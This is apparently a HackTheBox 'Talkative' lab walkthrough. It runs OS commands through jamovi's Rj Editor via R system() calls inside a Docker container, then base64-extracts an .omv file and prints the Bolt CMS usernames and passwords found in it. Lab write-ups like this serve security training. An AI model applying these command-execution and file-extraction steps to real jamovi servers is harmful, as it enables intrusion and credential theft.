Web
Nmap discovered a web server on the target port 8080
The running service is Tornado httpd 5.0
Webroot
I got redirected to the resource at /?id=0014f14f-bf37-49f5-839a-923348d42298
It seems to be a spreadsheet much like Microsoft Excel
the title suggests that it is jamovi
jamovi (stylized in all lower-case as jamovi) is a free and open-source computer program for data analysis and performing statistical tests.
I was able to get the version information through the left-hand side menu.
This particular version of jamovi is suffering from a XSS vulnerability, but it doesn’t seem all that relevant for now.
another interesting thing about the instance is that it has rj editor installed, which is a module that allows you to use the R programming language to analyze data from within jamovi
Clicking into the Modules, I have an option to open up the library
It shows the installed modules
the installed rj editor is version 1.0.8, which doesn’t seem to be vulnerable.
However, it literally just runs R codes, I can very much likely able to get code execution through this.
Rj Editor
Inside the Rj Editor, I can write the R codes in the left-hand side and run it via Ctrl+Shift+Enter
system("ls -la", intern = TRUE)
Using the system() method to call the OS command, ls -la.
It works.
The output appears to be the system root directory, but there is the .dockerenv file, which indicates that I am very much likely inside a Docker container
Docker Container
The current user is the root user
Based on the process information, this Docker container is solely used for the jamovi instance, which then is likely proxied through the host’s web service; Tordano httpd
Another interesting thing is that I am unable to execute any network related commands
The IP address is 172.18.0.2
Checking the home directory of the root user, there are 2 interesting files;
- The
.jamovifile, which is likely responsible for setting up the environment variables - The
bolt-administration.omvfile must be relevant to the Talkative running on the port80
bolt-administration.omv
Since it doesn’t seem possible to move the file around in the conventional way, I will get the file via base64 conversion
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ cat base64.txt | base64 -d
PK
K-*��ϳR0�3�rI,I�u,J��,KE��3��J��/��".�
��\��X����Ti�Q�`��\PK
K-*��ϳR0�3�rI,I�u,J��,KE��3��J��/��" �S%mq:Gjmeta�M��LK-.�
��\��X����Ti�Q�`��\PK
�S�3#b3�
index.html�Vmo�6��_qUQ ��N�(�� ��Z8i��(
�.��(n����@���ͶDM )�T�'�Bg�o�[������t�j����v�5+����s����g[&�v3RR�����\ |~�
���w���p�.�9p�&L^���5,��-)f�$߱�D�G����~���� fb.���l��&dp!)aE�rJ�
��a����V
1ІO�9��\�eS"�yA��"9�s��ޥ\�Ԅ#KA��Z�N�Mщ�2�O%��f.a4�n�\��0k|Э-��hAJ��ll��Bi��-ȍuKyj�q��3HSs�.�LG0������X
��S;hd��Ac+h�Q'v��.�
ݽkO�}b�:�q;���Њ�v*���jgڳ���H����Ois�&��Bƒ������َ�b8��Y7M�
�'N�ԥ�o�!��r��_M3����`��a�y���mf�4�۔�&��Z��3�?�5��º/�wA��y��>�9n���)ŒB%�&��� �� �rښb�<zp����C�o��(�E��7"�+"�3Ԓ�SȤ(!&PH�&N�u�"�_�V^�� �L�?<��d��~e�PK������^�51�J6�K�~]�D�Iws;^�m߷��gf%�����ş�8�T!4ԅ���
metadata.json͐=O�0��J�C�"�ؠ,��T,�é��������
�l���د�VH xC�E+�k6.Zn�8:��d��G�.(_]�8$RN���s�L+����8vR�吱`0}���3���W��R-^s����I�
B�3�9�,hޜ�7Qӫ�C�
3�����Z6Jҙ;�n�Dá�V����v�vC���W5)g3"6�}��R�/J�
A��t�Q'ye�� ��ݢ��=��Vs0������hl�'c���$�,g)�p}�O��PK
�S�I���
t�B�S��sS�P�i�9ũ�:�ILJ�)2��
ц@��Ē��Ĝ�Ē̲T���$%\�p}F@Y�y�X4b��4*)N,��ԈU�/�(�̓�����E)J�lf���⨄�G�fp`�{�����+X-����hN���PK
�SB4[data.binc````b& ff�f(��m@�PK
�S<���.201 empty/analysis`�bM�-(�Tb��-3b`��bJ-.�))�`vbp`�`���PK
�S%mq:Gj�META-INF/MANIFEST.MFPK
�S%mq:Gj�ymetaPK
�S�3#b3�
��index.htmlPK
�=metadata.jsonPK@�
�S�I���
�vxdata.jsonPK
�SB4[��Mdata.binPK
�S<���.2��01 empty/analysisPK�� Here is the recovered file on Kali. It’s in the binary format as the original file extension was omv
The omv extension is exclusively used for jamovi
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ cat base64.txt | base64 -d > bolt-administration.omvI will do the conversion and attempt to open it up using the target jamovi instance, so that I can check the content
It seems the jamovi instance only support opening local files
I remember seeing the Documents directory within the home directory of the root user.
This directory might be the directory shown as the local documents directory for the installed jamovi, in which case, I could just copy the bolt-administration.omv file to the Documents directory
like so
and it shows up here.
The target jamovi instance failed to open the file as it requires newer version of jamovi
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ file bolt-administration.omv
bolt-administration.omv: Zip archive data, at least v2.0 to extract, compression method=deflateSince the omv extension is also considered pkzip achieve, I will just attempt to open it up
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ unzip bolt-administration.omv
Archive: bolt-administration.omv
inflating: META-INF/MANIFEST.MF
inflating: meta
inflating: index.html
inflating: metadata.json
inflating: xdata.json
inflating: data.bin
inflating: 01 empty/analysisContent extracted
┌──(kali㉿kali)-[~/…/htb/labs/talkative/bolt-administration]
└─$ cat xdata.json
{"A": {"labels": [[0, "Username", "Username", false], [1, "matt@talkative.htb", "matt@talkative.htb", false], [2, "janit@talkative.htb", "janit@talkative.htb", false], [3, "saul@talkative.htb", "saul@talkative.htb", false]]}, "B": {"labels": [[0, "Password", "Password", false], [1, "jeO09ufhWD<s", "jeO09ufhWD<s", false], [2, "bZ89h}V<S_DA", "bZ89h}V<S_DA", false], [3, ")SQWGm>9KHEA", ")SQWGm>9KHEA", false]]}, "C": {"labels": []}} Checking one of the content, xdata.json, reveals the user information including credentials
matt:jeO09ufhWD<sjanit:bZ89h}V<S_DAsaul:)SQWGm>9KHEA
These credentials must be relevant to the Bolt instance running on the target port 80